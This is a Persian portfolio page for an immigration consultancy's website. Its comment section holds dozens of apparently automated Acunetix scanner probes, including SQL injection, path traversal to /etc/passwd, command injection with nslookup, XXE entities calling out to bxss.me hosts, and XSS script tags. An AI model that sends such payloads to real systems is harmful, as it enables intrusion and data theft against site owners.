بازگشت به لیست محصولات

طراحی نسخه اول سایت شرکت ویزایاب

موسسه بین المللی ویزایاب با کمک وکلای برجسته و رجیستر شده در سازمان های مهاجرت کشورهای استرالیا، نیوزلند و کانادا آماده ارایه خدمات مشاوره رایگان، ارزیابی شرایط اولیه موکلین، تنظیم و تکمیل مدارک لازم بر اساس معیارهای مورد نیاز این کشورها براساس جدیدترین و آخرین تغییرات قوانین مهاجرتی به کلیه متقاضیان در ایران و کشورهای دیگر میباشد. نیروهای متخصص و آشنا به امور در تمامی مراحل کارهمراه موکلین برای ارایه هرگونه اطلاعات درخصوص پروسه کاری خواهندبود.

چیتاسافت نسخه نخست وب سایت ویزایاب را بر پایه چیکا2 طراحی و پیاده سازی نمود.

نظرات کاربران

100 نظر

e

۲۶ مهر ۱۳۹۵ | ۰۱:۳۹

response.write(9785911*9508229)

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

1

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

'+response.write(9785911*9508229)+'

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

set|set&set

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

1

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

"+response.write(9785911*9508229)+"

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

$(nslookup tmTJunxO)

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

tiwgy7rR

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

&nslookup SwmObHb2&'\"`0&nslookup SwmObHb2&`'

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

-1 OR 2+449-449-1=0+0+0+1 --

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

IOSaQuwL

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

-1 OR 2+104-104-1=0+0+0+1

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

-1' OR 2+756-756-1=0+0+0+1 --

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

-1' OR 2+90-90-1=0+0+0+1 or 'LKjdzhQI'='

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

-1" OR 2+678-678-1=0+0+0+1 --

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

../../../../../../../../../../etc/passwd

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

../../../../../../../../../../../../../../../proc/version

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

../../../../../../../../../../etc/passwd.jpg

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

12345'"\'\");|]*{ <>

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

-1; waitfor delay '0:0:9' --

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

-1); waitfor delay '0:0:9' --

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

1 waitfor delay '0:0:9' --

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

/../..//../..//../..//../..//../..//etc/passwd.jpg

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

usvKqkPm'; waitfor delay '0:0:9' --

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

-1;select pg_sleep(3); --

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

/etc/passwd

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

-1);select pg_sleep(3); --

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

${10000159+10000447}

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

%2fetc%2fpasswd

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

-1));select pg_sleep(3); --

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

/.././.././.././.././.././.././.././../etc/./passwd%00

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

R3dxcCJO';select pg_sleep(3); --

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

UskIa9oS');select pg_sleep(3); --

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

1some_inexistent_file_with_long_name.jpg

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

Http://testasp.vulnweb.com/t/fit.txt

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

KJpsZYGD'));select pg_sleep(3); --

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

)

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

http://testasp.vulnweb.com/t/fit.txt?.jpg

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

!(()&&!|*|*|

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

testasp.vulnweb.com

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

^(#$!@#$)(()))******

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

&n946762=v978514

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

..

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

file:///etc/passwd

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

/\../\../\../\../\../\../\../etc/passwd

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

WEB-INF/web.xml

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

/WEB-INF/web.xml

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

WEB-INF\web.xml

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

../../../../../../../../../../windows/win.ini

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

;print(md5(acunetix_wvs_security_test));

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

../../../../../../../../../../boot.ini

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

';print(md5(acunetix_wvs_security_test));$a='

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

../../../../../../../../../../windows/win.ini.jpg

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

";print(md5(acunetix_wvs_security_test));$a="

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

${@print(md5(acunetix_wvs_security_test))}

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

................windowswin.ini

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

${@print(md5(acunetix_wvs_security_test))}\

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

..\..\..\..\..\..\..\..\windows\win.ini

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

WEB-INF/web.xml

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

WEB-INF\web.xml

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

comment

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

comment

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

comment/.

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

http://hitYfBgpj3ZRM.bxss.me/

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

1'"

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

\

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

1

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

@@Xazuu

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

JyI=

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

(select convert(int,CHAR(65)))

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

/www.vulnweb.com

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://hitu0JYnLx4tQ.bxss.me/"> ]> <xxx>&acunetixent;</xxx>

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN" "http://hitTEl7KxSk6f.bxss.me/"> <roottag>acunetix</roottag>

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

<xi:include href="http://hit6wz6dffnJO.bxss.me/" parse="text"/>

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

'"

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

http://testasp.vulnweb.com/t/xss.html?%00.jpg

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

<!--

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY % xxe SYSTEM "http://hitg41xGm4IMa.bxss.me/"> %xxe; ]>

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE body SYSTEM "http://hitr7rUqYXsCa.bxss.me/"> <body><method>test</method></body>

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

1'"()&%<acx><ScRiPt >waMk(9082)</ScRiPt>

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

'"()&%<acx><ScRiPt >waMk(9361)</ScRiPt>

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

1_9760

e

۲۶ مهر ۱۳۹۵ | ۱۰:۳۹

'"()